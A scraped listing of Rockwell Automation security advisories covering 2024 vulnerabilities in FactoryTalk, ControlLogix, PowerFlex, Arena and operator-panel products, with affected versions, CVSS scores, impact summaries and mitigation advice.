CISA | Rockwell Automation FactoryTalk View ME

https://www.cisa.gov/news-events/ics-advisories/icsa-24-086-04

2024-21915

24-046-16

CISA | Rockwell Automation FactoryTalk Service Platform

https://www.cisa.gov/news-events/ics-advisories/icsa-24-046-16

2024-21917

24-030-06

CISA | Rockwell Automation FactoryTalk Service Platform

https://www.cisa.gov/news-events/ics-advisories/icsa-24-030-06
High
SD1671 | FactoryTalk® Remote Access™ has Unquoted Executables
Published Date:
May 07, 2024
Last Updated:
December 04, 2024
CVE IDs:
CVE-2024-3640
CVSS Scores (v3.1):
7.7
CVSS Scores (v4.0):
7.0
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No
Más información Less Details Chevron DownChevron Down

Published Date: May 14, 2024

Last updated: May 14, 2024

Revision Number: 1.0

CVSS Score: v3.1: 7.7/10, v4.0: 7.0

 

AFFECTED PRODUCTS AND SOLUTION

 

 

Affected Product

 

 

 

 

First Known in software version

 

 

 

 

Corrected in software version

 

 

 

 

FactoryTalk® Remote Access™ (FTRA)

 

 

 

 

v13.5.0.174

 

 

 

 

V13.6  

 

 

 

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities. 

CVE-2024-3640 IMPACT

An unquoted executable path exists in the affected products, possibly resulting in remote code execution if exploited. While running the FTRA installer package, the executable path is not properly quoted, which could allow a threat actor to enter a malicious executable and run it as a System user. A threat actor needs admin privileges to exploit this vulnerability. 

 

CVSS Base Score v3.1: 6.5/10

CVSS Vector String: CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H

CWE: CWE-428: Unquoted Search Path or Element

 

CVSS Base Score v4.0: 7.0/10

CVSS Vector String 4.0: CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

 

Known Exploited Vulnerability (KEV) database:  No

 

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment specific prioritization.

 

Mitigations and Workarounds 

Users using the affected software and who are not able to upgrade to one of the corrected versions are encouraged to apply security best practices below, where possible. 

 

 ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.     

 

 

High
SD1670 | Datalog Function within in FactoryTalk® View SE contains SQL Injection Vulnerability
Published Date:
May 07, 2024
Last Updated:
December 03, 2024
CVE IDs:
CVE-2024-4609
CVSS Scores (v3.1):
7.6
CVSS Scores (v4.0):
8.8
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No
Más información Less Details Chevron DownChevron Down

 

Published Date:  May 15, 2024

Last updated: May 22, 2024  

May 22, 2024 - Updated corrected software versions

Revision Number: 2.0

CVSS Score: v3.1: 7.6/10, v4.0 8.8/10

 

The security of our products is important to us as your chosen industrial automation supplier. This vulnerability was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

 

 

Affected Product

 

 

 

 

First Known in software version

 

 

 

 

Corrected in software version

 

 

 

 

FactoryTalk® View SE 

 

 

 

 

< 14

 

 

 

 

V11,12,13, 14  or later

 

 

 

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities.   

A vulnerability exists in the FactoryTalk® View SE Datalog function that could allow a threat actor to inject a malicious SQL statement if the SQL database has no authentication in place or if legitimate credentials were stolen. If exploited, the attack could result in information exposure, revealing sensitive information. Additionally, a threat actor could potentially modify and delete the data in a remote database. An attack would only affect the HMI design time, not runtime.    

 

CVE-2024-4609 IMPACT

CVSS v3.1 Base Score: 7.6

CVSS Vector String: CVSS 3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L 

 

CVSS v4.0 Base Score: 8.8

CVSS Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:N/SI:N/SA:N

CWE: CWE-20 Improper input invalidation

 

Known Exploited Vulnerability (KEV) database:  No

 

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environmentally specific prioritization.

 

Mitigations and Workarounds 

Users using the affected software and who are not able to upgrade to one of the corrected versions are encouraged to apply security best practices, where possible.  

 

 

ADDITIONAL RESOURCE

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.     

High
SD1669 | FactoryTalk® Historian SE vulnerable to AVEVA-2024-001 and AVEVA-2024-002
Published Date:
May 06, 2024
Last Updated:
November 19, 2024
CVE IDs:
CVE-2023-31274, CVE-2023-34348
CVSS Scores (v3.1):
7.5
CVSS Scores (v4.0):
7.7
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No
Más información Less Details Chevron DownChevron Down

Published Date: May 9, 2024

Last updated: May 9, 2024

Revision Number: 1.0

CVSS Score: v3.1: 7.5/10, v4.0: 7.7/10

 

 

AFFECTED PRODUCTS AND SOLUTION

 

 

Affected Product

 

 

 

 

Affected Versions

 

 

 

 

Corrected in software version

 

 

 

 

FactoryTalk® Historian SE

 

 

 

 

< v9.0

 

 

 

 

v9.01 and later

 

 

 

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities. 

CVE-2023-31274 IMPACT

FactoryTalk® Historian SE utilizes the AVEVA PI Server, which contains a vulnerability, which could allow an unauthenticated user to cause a partial denial-of-service condition in the PI Message Subsystem of a PI Server by consuming available memory. This vulnerability exists in FactoryTalk® Historian SE versions 9.0 and earlier. Exploitation of this vulnerability could cause FactoryTalk® Historian SE to become unavailable, requiring a power cycle to recover it. 

CVSS Base Score v3.1: 7.5/10

CVSS Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

 

CVSS Base Score v4.0: 7.7/10

CVSS Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:N/SI:N/SA:H

CWE: Dependency on Vulnerable third-party Component

 

CVE-2023-34348 IMPACT

FactoryTalk® Historian SE use the AVEVA PI Server, which contains a vulnerability that could allow an unauthenticated user to remotely crash the PI Message Subsystem of a PI Server, resulting in a denial-of-service condition. This vulnerability exists in FactoryTalk® Historian SE versions 9.0 and earlier.  Exploitation of this vulnerability could cause FactoryTalk® Historian SE to become unavailable, requiring a power cycle to recover it.

CVSS Base Score v3.1: 7.5/10

CVSS Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

 

CVSS Base Score v4.0: 7.7/10

CVSS Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:N/SI:N/SA:H

CWE: Dependency on Vulnerable third-party Component

 

Known Exploited Vulnerability (KEV) database:  No

 

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

 

Mitigations and Workarounds 

Users using the affected software are encouraged to install FactoryTalk® Historian SE version 9.01 or higher as soon as feasible. For customers unable to upgrade to v9.0, defensive measures are available in the Rockwell article.  

Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.  

 

 ADDITIONAL RESOURCES

 

Critical
SD1668 | FactoryTalk® Production Centre Vulnerable to Apache ActiveMQ Vulnerability
Published Date:
April 18, 2024
Last Updated:
December 03, 2024
CVE IDs:
CVE-2023-4664
CVSS Scores (v3.1):
9.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Published Date: April, 16, 2024

Last updated: April 16, 2024

Revision Number: 1.0

CVSS Score: 9.8 /10

AFFECTED PRODUCTS AND SOLUTION

Affected Product

First Known in Software Version

Corrected in Software Version

FactoryTalk® Production Centre

10.0

11.03.00

 

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 of the CVSS scoring system to assess the following vulnerabilities. The security of our products is important to us as your chosen industrial automation supplier.  This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

 

CVE-2023-4664 IMPACT

Apache ActiveMQ, a component utilized in FactoryTalk Production Centre, is vulnerable to Remote Code Execution.  The vulnerability may allow a remote threat actor with network access to a broker to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol. This could cause the broker to instantiate any class on the classpath. 

CVSS Base Score: 9.8

CVSS Vector string: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE: 502 Deserialization of Untrusted Data

Known Exploited Vulnerability (KEV) database: Yes

Users can use Stakeholder-Specific Vulnerability Categorization to generate environment specific prioritization.

Mitigations and Workarounds

Users using the affected software and who are not able to upgrade to one of the corrected versions are encouraged to apply security best practices, where possible. 

  • ·      Update to the version that fixes the issue as detailed in this article.
  • ·       Follow the security recommendations in PN1592 for FTPC.
  • ·       Implement Security Best Practices

 ADDITIONAL RESOURCES

·       JSON CVE-2023-46604

Critical
SD1666 | ControlLogix® and GuardLogix® Vulnerable to major nonrecoverable fault due to Invalid Header Value
Published Date:
April 11, 2024
Last Updated:
December 04, 2024
CVE IDs:
CVE-2024-3493
CVSS Scores (v3.1):
8.6
CVSS Scores (v4.0):
9.2
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No
Más información Less Details Chevron DownChevron Down

Published Date: April 11, 2024

Last updated: May 2, 2024

Revision Number: 2.0

May 2, 2024 - Added to products to Affected Products and Solutions section

CVSS Score:v.3.1 8.6/10, v.4.0 9.2/10

 

AFFECTED PRODUCTS AND SOLUTION

 

 

Affected Product

 

 

 

 

First Known in Firmware Revision

 

 

 

 

Corrected in Firmware Revision

 

 

 

 

ControlLogix® 5580

 

 

 

 

V35.011

 

 

 

 

V35.013, V36.011 and later

 

 

 

 

GuardLogix 5580

 

 

 

 

V35.011

 

 

 

 

V35.013, V36.011 and later

 

 

 

 

CompactLogix 5380

 

 

 

 

V35.011

 

 

 

 

V35.013, V36.011 and later

 

 

 

 

Compact GuardLogix 5380

 

 

 

 

V35.011

 

 

 

 

V35.013, V36.011 and later

 

 

 

 

1756-EN4TR

 

 

 

 

V5.001

 

 

 

 

V6.001 and later

 

 

 

 

ControlLogix 5580 Process

 

 

 

 

V35.011

 

 

 

 

V35.013, V36.011 and later

 

 

 

 

CompactLogix 5380 Process

 

 

 

 

V35.011

 

 

 

 

V35.013, V36.011and later

 

 

 

 

CompactLogix 5480

 

 

 

 

V35.011

 

 

 

 

V35.013, V36.011 and later

 

 

VULNERABILITY DETAILS  

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities. 

CVE-2024-3493 IMPACT

 A specific malformed fragmented packet type (fragmented packets may be generated automatically by devices that send large amounts of data) can cause a major nonrecoverable fault (MNRF). If exploited, the affected product will become unavailable and require a manual restart to recover it. Additionally, an MNRF could result in a loss of view and/or control of connected devices. 

CVSS Base Score: 8.6/10

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

 

CVSS Base Score: 9.2/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H

CWE: Improper Input Validation

Known Exploited Vulnerability (KEV) database:  No

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

 

Mitigations and Workarounds  

Users using the affected software and who are not able to upgrade to one of the corrected versions are encouraged to apply security best practices, where possible.  

 ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.     

SD1667 | Input/output Device Vulnerable to Major Nonrecoverable Fault
Published Date:
April 11, 2024
Last Updated:
December 04, 2024
CVE IDs:
CVE-2024-2424
Products:
5015-AENFTXT
CVSS Scores (v3.1):
7.5
CVSS Scores (v4.0):
8.7
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No
Más información Less Details Chevron DownChevron Down

Published Date: April 11, 2024

Last updated: April 17, 2024

Revision Number: 2.0

    4/17/24 - Updated Affected Products and Solutions 

CVSS Score: v3.1: 7.5/10, v4.0: 8.7/10

 

AFFECTED PRODUCTS AND SOLUTION

 

 

Affected Product

 

 

 

 

First Known in firmware version

 

 

 

 

Corrected in firmware version

 

 

 

 

5015-AENFTXT

 

 

 

 

  v2.011

 

 

 

 

v2.012 and later

 

 

 

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities. 

CVE-2024-2424 IMPACT

An input validation vulnerability exists among the affected products that causes the secondary adapter to result in a major nonrecoverable fault (MNRF) when malicious input is entered. If exploited, the availability of the device will be impacted, and a manual restart is required. Additionally, a malformed PTP packet is needed to exploit this vulnerability.  

 

CVSS 3.1 Base Score: 7.5/10 

CVSS Vector: CVSS: 3.1 AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

 

CVSS 4.0 Base Score: 8.7/10

CVSS Vector: CVSS: 4.0 CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N 

CWE: Improper Input Validation

 

Known Exploited Vulnerability (KEV) database:  No

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Mitigations and Workarounds 

Users using the affected software, who are not able to upgrade to one of the corrected versions, are encouraged to apply security best practices, where possible.  

 ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.  

 

High
SD1665 | Arena® Simulation Vulnerabilities
Published Date:
March 26, 2024
Last Updated:
October 16, 2024
CVE IDs:
CVE-2024-21912, CVE-2024-21913, CVE-2024-2929, CVE-2024-21918, CVE-2024-21919, CVE-2024-21920
Products:
Arena® Simulation Software
CVSS Scores (v3.1):
7.8, 4.4
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No
Más información Less Details Chevron DownChevron Down

Arena® Simulation Vulnerabilities
Published Date: March 26, 2024
Last updated: March 26, 2024
Revision Number: 1.0
CVSS Score: 7.8

AFFECTED PRODUCTS AND SOLUTION

Affected Product

CVE

First Known in Software Version

Corrected in Software Version

Arena® Simulation Software

CVE-2024-21912

16.00

16.20.03

CVE-2024-21913

CVE-2024-2929

CVE-2024-21918

CVE-2024-21919

CVE-2024-21920

16.00
  • This issue is within the Microsoft dynamic library link file and will not be remediated.  
  • Do not open untrusted files from unknown sources to mitigate the issue

VULNERABILITY DETAILS

These vulnerabilities were reported to Rockwell Automation by Michael Heinzl.  Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

 

CVE-2024-21912 IMPACT

An arbitrary code execution vulnerability could let a malicious user insert unauthorized code into the software. This is done by writing beyond the designated memory area, which causes an access violation. Once inside, the threat actor can run harmful code on the system. This affects the confidentiality, integrity, and availability of the product. To trigger this, the user would unwittingly need to open a malicious file shared by the threat actor.

CVSS Base Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-787 Out-of-bounds Write

Known Exploited Vulnerability (KEV) database: No

 

CVE-2024-21913 IMPACT

A heap-based memory buffer overflow vulnerability could potentially allow a malicious user to insert unauthorized code into the software by overstepping the memory boundaries, which triggers an access violation.  Once inside, the threat actor can run harmful code on the system. This affects the confidentiality, integrity, and availability of the product. To trigger this, the user would unwittingly need to open a malicious file shared by the threat actor.

CVSS Base Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-122: Heap-based Buffer Overflow

Known Exploited Vulnerability (KEV) database: No

 

CVE-2024-2929 IMPACT

A memory corruption vulnerability could potentially allow a malicious user to insert unauthorized code to the software by corrupting the memory triggering an access violation.  Once inside, the threat actor can run harmful code on the system. This affects the confidentiality, integrity, and availability of the product. To trigger this, the user would unwittingly need to open a malicious file shared by the threat actor.

CVSS Base Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-119: Improper Restriction of Operations within the Bounds of a Memory Buffer

Known Exploited Vulnerability (KEV) database: No

 

CVE-2024-21918 IMPACT

A memory buffer vulnerability could potentially allow a malicious user to insert unauthorized code to the software by corrupting the memory and triggering an access violation.  Once inside, the threat actor can run harmful code on the system. This affects the confidentiality, integrity, and availability of the product. To trigger this, the user would unwittingly need to open a malicious file shared by the threat actor.

CVSS Base Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-416: Use After Free

Known Exploited Vulnerability (KEV) database: No

 

CVE-2024-21919 IMPACT

An uninitialized pointer could potentially allow a malicious user to insert unauthorized code to the software by leveraging the pointer after it is properly.  Once inside, the threat actor can run harmful code on the system. This affects the confidentiality, integrity, and availability of the product. To trigger this, the user would unwittingly need to open a malicious file shared by the threat actor.

CVSS Base Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE-824: Access of Uninitialized Pointer

 

CVE-2024-21920 IMPACT

A memory buffer vulnerability might let a threat actor read beyond the intended memory boundaries. This could reveal sensitive information and even cause the application to crash, resulting in a denial-of-service condition. To trigger this, the user would unwittingly need to open a malicious file shared by the threat actor.

CVSS Base Score: 4.4
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:L
CWE-125: Out-of-bounds Read

Known Exploited Vulnerability (KEV) database: No

 

Mitigations and Workarounds

Customers using the affected software are encouraged to apply the risk mitigations, if possible.

  • Do not open untrusted files from unknown sources.
  • For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

High
SD1664 | Denial-of-service and Input Validation Vulnerabilities in PowerFlex® 527
Published Date:
March 21, 2024
Last Updated:
December 04, 2024
CVE IDs:
CVE-2024-2425, CVE-2024-2426, CVE-2024-2427
Products:
PowerFlex® 527
CVSS Scores:
7.5, 8.7
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
Yes
Más información Less Details Chevron DownChevron Down

Published Date: March 21, 2024
Last updated: March 21, 2024
Revision Number: 1.0
CVSS Score: v3.1: 7.5/10, v4.0: 8.7/10

AFFECTED PRODUCTS AND SOLUTION

Affected Product

First Known in software version

Corrected in software version

PowerFlex® 527

 v2.001.x <

n/a

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-2425 IMPACT

A denial-of-service vulnerability exists in the PowerFlex® 527 due to improper input validation in the device. If exploited, the web server will crash and need a manual restart to recover it.

CVSS Base Score 3.1: 7.5/10

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS Base Score 4.0:  8.7/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE: CWE – 120 Improper Input Validation

Known Exploited Vulnerability (KEV) database:  No

CVE-2024-2426 IMPACT

A denial-of-service vulnerability exists in the PowerFlex® 527 due to improper input validation in the device. If exploited, a disruption in the CIP communication will occur and a manual restart will be required by the user to recover it.

CVSS Base Score 3.1: 7.5/10

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS Base Score 4.0:  8.7/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE: CWE – 120 Improper Input Validation

Known Exploited Vulnerability (KEV) database:  No

CVE-2024-2427 IMPACT

A denial-of-service vulnerability exists in the PowerFlex® 527 due to improper traffic throttling in the device. If multiple data packets are sent to the device repeatedly the device will crash and require a manual restart to recover.

CVSS Base Score 3.1: 7.5/10

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS Base Score 4.0: 8.7/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE: CWE-400: Uncontrolled Resource Consumption

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Mitigations and Workarounds

There is no fix currently for this vulnerability. Users using the affected software are encouraged to apply risk mitigations and security best practices, where possible.

  • Implement network segmentation confirming the device is on an isolated network.
  • Disable the web server, if not needed. The web server is disabled by default. Disabling this feature is available in v2.001.x and later.
  • Security Best Practices

 ADDITIONAL RESOURCES

Medium
SD1663 | FactoryTalk® View ME on PanelView™ Plus 7 Boot Terminal lack Security Protections
Published Date:
March 21, 2024
Last Updated:
December 03, 2024
CVE IDs:
CVE-2024-21914
Products:
FactoryTalk® View ME
CVSS Scores (v3.1):
5.3
CVSS Scores (v4.0):
6.9
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No
Más información Less Details Chevron DownChevron Down

Published Date: March 21, 2024
Last updated: March 21, 2024
Revision Number: 1.0
CVSS Score: v3.1 5.3/10, v.4.0 6.9/10

The security of our products is important to us as your chosen industrial automation supplier. This vulnerability was found internally during routine testing and is being reported based on our commitment to customer transparency.

AFFECTED PRODUCTS AND SOLUTION

Affected Product

First Known in software version

Corrected in software version

FactoryTalk® View ME

<v14

V11

V12

V13

V14

VULNERABILITY DETAILS

Rockwell Automation used CVSS v3.1 and v4.0 scoring system to assess the following vulnerabilities.

CVE-2024-21914 IMPACT

A vulnerability exists in the affected product that allows a malicious user to restart the PanelView™ Plus 7 terminal remotely without security protections. If the vulnerability is exploited, it could lead to the loss of view or control of the PanelView™ product.

CVSS 3.1 Base Score: 5.3

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

CVSS 4.0 Base Score: 6.9

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N

CWE: Improper security protection for remote restart action

Known Exploited Vulnerability (KEV) database:  No

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Mitigations and Workarounds

Users using the affected software, who are not able to upgrade to one of the corrected versions, are encouraged to apply security best practices, where possible.  

 ADDITIONAL RESOURCES

Critical
SD1662 | FactoryTalk® Service Platform Elevated Privileges Vulnerability Through Web Service Functionality
Published Date:
February 14, 2024
Last Updated:
December 04, 2024
CVE IDs:
CVE-2024-21915
Products:
FactoryTalk® Service Platform
CVSS Scores (v3.1):
9.0
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Published Date: February 15, 2024
Last updated:  February 15, 2024
Revision Number: 1.0
CVSS Score: 9.0/10

The security of our products is important to us as your chosen industrial automation supplier.  This vulnerability was found internally during routine testing and is being reported based on our commitment to customer transparency.

AFFECTED PRODUCTS AND SOLUTION

Affected Product

First Known in software version

Corrected in software version

FactoryTalk® Service Platform

             <v2.74

Update to V2.74 or later


VULNERABILITY DETAILS

Rockwell Automation used version 3.1 of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-21915 IMPACT

A privilege escalation vulnerability exists in FactoryTalk® Service Platform (FTSP). If exploited, a malicious user with basic user group privileges could potentially sign into the software and receive FTSP Administrator Group privileges. A threat actor could potentially read and modify sensitive data, delete data and render the FTSP system unavailable.

CVSS Base Score: 9.0
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:CC:H/I:H/A:H
CWE: CWE-279: Incorrect Execution-Assigned Permissions

Known Exploited Vulnerability (KEV) database:  No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment specific prioritization.

Mitigations and Workarounds

Customers using the affected software are encouraged to apply the risk mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.

ADDITIONAL RESOURCES

High
SD1661 | Denial-of-service Vulnerability in ControlLogix® and GuardLogix® Controllers
Published Date:
January 30, 2024
Last Updated:
November 20, 2024
CVE IDs:
CVE-2024 21916
Products:
ControlLogix® 5570, GuardLogix® 5570, ControlLogix® 5570 Redundancy
CVSS Scores (v3.1):
8.6
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No
Más información Less Details Chevron DownChevron Down

Denial-of-service Vulnerability in ControlLogix® and GuardLogix® Controllers

Published Date: January 30, 2024

Last updated: 1.0

Revision Number: 1.0

CVSS Score: 8.6

AFFECTED PRODUCTS AND SOLUTION

Affected Product

First Known in Firmware

Corrected in Firmware

ControlLogix® 5570

20.011

v33.016, 34.013, 35.012, 36.011 and later

GuardLogix® 5570

20.011

v33.016, 34.013, 35.012, 36.011 and later

ControlLogix® 5570 Redundancy

20.054_kit1

v33.053_kit1, 34.052_kit1, 35.052_kit1, 36.051_kit1 and later

Mitigations and Workarounds

Customers using the affected software are encouraged to apply the risk mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024 21916 IMPACT

A denial-of-service vulnerability exists in the affected products, listed above. If exploited, the product could potentially experience a major nonrecoverable fault (MNRF). The device will restart itself to recover from the MNRF .

CVSS Base Score: 8.6

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

CWE: Improper Restriction of Operations within the Bounds of a Memory Buffer

Known Exploited Vulnerability (KEV) database:  No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

Critical
SD1660 | FactoryTalk® Service Platform Service Token Vulnerability
Published Date:
January 30, 2024
Last Updated:
December 04, 2024
CVE IDs:
CVE - 2024 21917
Products:
FactoryTalk® Service Platform
CVSS Scores (v3.1):
9.8
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No
Más información Less Details Chevron DownChevron Down

FactoryTalk® Service Platform Service Token Vulnerability

Published Date: January 30, 2024

Last updated: March 5th, 2024 *Updated Mitigations and Workarounds*

Revision Number: 1.0

CVSS Score: 9.8/10

AFFECTED PRODUCTS AND SOLUTION

Affected Product

First Known in software version

Corrected in software version

FactoryTalk® Service Platform

<= v6.31

v6.40 or later

Mitigations and Workarounds

Customers using the affected software are encouraged to apply the risk mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.

Customers updating to v6.40 or later should do one of the following steps:

  1. Set the FactoryTalk Directory’s System Communications Type security policy to SOCKET.IO. This prevents FactoryTalk Services Platform from using the DCOM communication channel. When set to SOCKET.IO only v6.40, and later, FactoryTalk Directory clients can communicate with the FactoryTalk Directory server.

  2. If the v6.40 (or later) FactoryTalk Directory server must support communication with legacy FactoryTalk Directory client versions, v6.31 and earlier, do not alter the System Communication Type setting from AUTO or DCOM.
    Instead, elevate DCOM Authentication Level to PACKET PRIVACY (‘6’). Please refer to Mitigating Microsoft DCOM Hardening Patch (CVE-2021-26414) for Affected Rockwell Automation Products (custhelp.com)

IMPORTANT! Two v 6.40 (or later) FactoryTalk Directory security policies can prevent legacy FactoryTalk Directory clients, v6.31 and earlier, from connecting with the FactoryTalk Directory server. Ensure both security policies are set to Legacy to allow the connection.
The two security policies are the Service Token signature method and Encryption method.

Customers who are unable to update to v6.40 or later should apply the following mitigations:

VULNERABILITY DETAILS

Rockwell Automation used CVSS v3.1 scoring system to assess the following vulnerabilities.

CVE - 2024 21917 IMPACT

A vulnerability exists in the affected product that allows a malicious user to obtain the service token and use it for authentication on another FTSP directory. This is due to the lack of digital signing between the FTSP service token and directory.  If exploited, a malicious user could potentially retrieve user information and modify settings without any authentication.

CVSS Base Score: 9.8/10 (Critical)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE: 347 Improper Verification of Cryptographic Signature

Known Exploited Vulnerability (KEV) database:  No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment specific prioritization.

ADDITIONAL RESOURCES

High
SD1659 | LP30/40/50 and BM40 Operator Interface Vulnerable to CODESYS Vulnerabilities
Published Date:
January 24, 2024
Last Updated:
December 01, 2024
CVE IDs:
CVE-2022-47378, CVE-2022-47379, CVE-2022-47380, CVE-2022-47381 , CVE-2022-47382, CVE-2022-47383, CVE-2022-47384, CVE-2022-47386, CVE-2022-47387, CVE-2022-47388, CVE-2022-47389, CVE-2022-47390, CVE-2022-47385 , CVE-2022-47392 , CVE-2022-47393
Products:
LP30 Operator Panel, LP40 Operator Panel, BM40 Operator Panel, LP50 Operator Panel
CVSS Scores (v3.1):
6.5, 8.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Published Date: January 25, 2024

Last updated: January 25, 2024

Revision Number: 1.0

CVSS Score: 8.8

AFFECTED PRODUCTS AND SOLUTION

Affected Product (automated)

First Known in Software Revision

Corrected in Software Revision

LP30 Operator Panel

Codesys versions before V3.5.19.0

Codesys 3.5.19.2

LP40 Operator Panel

Codesys versions before V3.5.19.0

Codesys 3.5.19.2

BM40 Operator Panel

Codesys versions before V3.5.19.0

Codesys 3.5.19.2

LP50 Operator Panel

Codesys versions before V3.5.19.0

Codesys 3.5.19.2

 

VULNERABILITY DETAILS

